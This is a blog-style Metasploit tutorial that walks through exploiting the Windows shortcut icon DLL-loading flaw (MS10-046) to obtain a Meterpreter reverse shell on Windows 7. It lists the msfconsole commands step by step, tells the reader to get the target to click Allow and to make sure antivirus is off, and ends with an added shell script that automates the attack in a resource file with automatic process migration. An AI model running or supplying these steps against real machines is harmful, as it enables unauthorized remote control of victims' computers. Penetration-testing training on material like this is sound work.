Metasploit Basics : Reverse Shell Win7
Metasploit. Anyone who has done even the most cursory investigation into the field of penetration testing or hacking has inevitably heard of it. First released in 2003, Metasploit is THE exploit framework. At the time of this writing Metasploit boasts over 1500 exploits and nearly 500 different payloads, all of which can be combined and used in a number of different ways. Today I am going to go over some of the basics of its most popular interface, the Metasploit Console (msfconsole).
I am going to skip the downloading and installation and just assume you are using Kali Linux; Metasploit comes preloaded on all recent versions. All you need to do is open a terminal window and type the command
~ > service postgresql start
This starts the PostgreSQL database that Metasploit uses to store hosts, services, credentials and any other data you capture during and after exploitation. Another trick I have learned with the newer releases of Kali is to click the Metasploit icon in the favorites menu: this runs some initial database setup the first time the application is started.
OK, now that we have the database running, let's fire up the command-line console.
~ > msfconsole
It should look like this:
Now that we have msfconsole up and running, there are a ton of different commands available. A useful one to know from the start is help followed by the command you want help with. In the example below I show what the output of help route looks like.
Metasploit works as a framework that is constantly collecting exploits from the open-source infosec community. There are several ways to search for the modules that implement these exploits. The first is the Module Database at https://www.rapid7.com/db/modules/, which has a user interface that is pretty self-explanatory. Below is a screenshot of what the site looks like.
The way I prefer to search for modules is right here in the console. Using the built-in search functionality is almost always the most efficient way to go. It does require that you know roughly what you are looking for, say for example ms10_046. If you are unfamiliar with that format, google it, but the TL;DR is that MSyy-nnn is the numbering scheme for Microsoft security bulletins. This particular one (MS10-046, CVE-2010-2568) covers a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL; Windows loads the DLL just to render the icon, so the victim never has to click the shortcut itself. The Metasploit module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
If we run the command
msf > search ms10_046
we get output like the listing below.
Once you have located the module, pull up its details with
msf > info exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Now we see a treasure trove of information about the module: the name, module path, platform, whether or not it requires privileges, its rank, available targets, basic options, payload information, a description, and references (CVE, MSB, URL) to the online vulnerability database entries corresponding to the module.
Once we have determined that this is indeed the module we want, load it with the command
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
(You can drop the exploit/ prefix from the module path here; Metasploit figures as much.)
Now that we have the module loaded we still need to give it some more information. Remember fields like SRVHOST and LHOST in the info output? We need to tell Metasploit where to aim the cannon! Almost all modules need some configuration, so do a bit of research into exactly how the exploit is supposed to work, but also know that Metasploit will fill in sensible defaults for anything you leave unset. If you do not set PAYLOAD, for example, the default for Windows targets is windows/meterpreter/reverse_tcp, which is the reverse shell this walkthrough ends up with.
For our example we simply want to set SRVHOST (the address the WebDAV service listens on and that the generated UNC path points at) and LHOST (the address the Meterpreter payload connects back to) to the IP address of the host running Metasploit. If you aren't sure what it is, you can run ifconfig at any time from within msfconsole and Kali will spit out the info. Setting these is easy; simply enter the following...
msf > set SRVHOST <YOUR IP ADDRESS>
msf > set LHOST <YOUR IP ADDRESS>
Now let's do a quick check to make sure everything is set correctly
msf > show options
You should now see SRVHOST and LHOST set to the IP address you entered, and the payload listed under the payload options. We are now good to go!
This is my favorite part... Run the command...
msf > exploit
Ahhhhh, gives me goosebumps! Anyway, once you run this command the magic of Metasploit truly starts. You just sit back and watch it do its thing!
This particular exploit gives you a URL (simply your IP address plus a path) to send to the target. Once they open it a popup window appears asking for permission; once they click Allow, you're in! NOTE: make sure there is no antivirus running on the target PC. The stock Meterpreter payload is well known to AV products and will be blocked on sight.
You can list the connected sessions by running the command sessions in msfconsole. Once you see the victim's session, it's time to interact with it. Run the command
msf > sessions -i 1
Once connected you are in a Meterpreter shell, not a Linux one, but many of its commands look familiar: sysinfo, getuid, pwd, ls, cd, cat and download let you browse the system, and shell drops you into a native Windows cmd.exe. Because the payload is running inside whatever process loaded the malicious DLL, migrate to a more stable process (migrate <pid>) before you do anything else, or the session dies with that process.
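Here is the whole walkthrough above, from use through exploit, captured in a Metasploit resource script so the lab can be repeated without retyping it. This is an added example and not part of the original post or of the Metasploit project: the lab address 192.168.56.10 is a made-up placeholder, the URIPATH and AutoRunScript settings are additions beyond the steps in the post (URIPATH / keeps the link short, the migrate post module moves out of the process that loaded the DLL as soon as a session opens), the script validates the address before splicing it into the rc file so a bad value is never handed to msfconsole as a command, and it ends with exploit -j so the WebDAV server runs as a background job and the sessions command stays available.

```shell
#!/bin/sh
# Added example (not from the original post): replay the msfconsole steps
# above from a resource (.rc) file. 192.168.56.10 is a hypothetical lab address.

# valid_ipv4 ADDR -> 0 if ADDR is a dotted quad with every octet in 0..255
valid_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    _old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$_old_ifs
    for _octet in "$@"; do
        [ "$_octet" -le 255 ] || return 1
    done
    return 0
}

# gen_rc ADDR OUTFILE -> write the resource script; refuses a bad address so
# nothing unexpected is ever passed to msfconsole as a command
gen_rc() {
    valid_ipv4 "$1" || { echo "gen_rc: '$1' is not an IPv4 address" >&2; return 1; }
    cat > "$2" <<EOF
# ms10_046 lab: WebDAV share on SRVHOST, Meterpreter calls back to LHOST
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST $1
set LHOST $1
set URIPATH /
# move out of the process that loaded the DLL as soon as a session opens
set AutoRunScript post/windows/manage/migrate
show options
exploit -j
EOF
}

# on_local_iface ADDR -> 0 if ADDR is configured on this box, so the victim
# can actually reach SRVHOST and LHOST; used as a warning, not a hard failure
on_local_iface() {
    ip -o -4 addr show 2>/dev/null | grep -q "inet $1/"
}

# run_lab ADDR -> generate the rc file and start msfconsole on it
run_lab() {
    rc=$(mktemp) || return 1
    gen_rc "$1" "$rc" || return 1
    on_local_iface "$1" || echo "warning: $1 is not on a local interface" >&2
    msfconsole -q -r "$rc"
}

# usage: sh ms10_046_lab.sh 192.168.56.10
if [ "$#" -eq 1 ]; then
    run_lab "$1"
fi
```

Once msfconsole is up with the job running, sessions lists incoming Meterpreter connections and sessions -i 1 attaches to the first one, exactly as in the manual walkthrough.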
This should hopefully show you the power Metasploit gives you. I hope you have enjoyed it, and as always feel free to leave feedback, and remember... everything can be hacked!
_Jason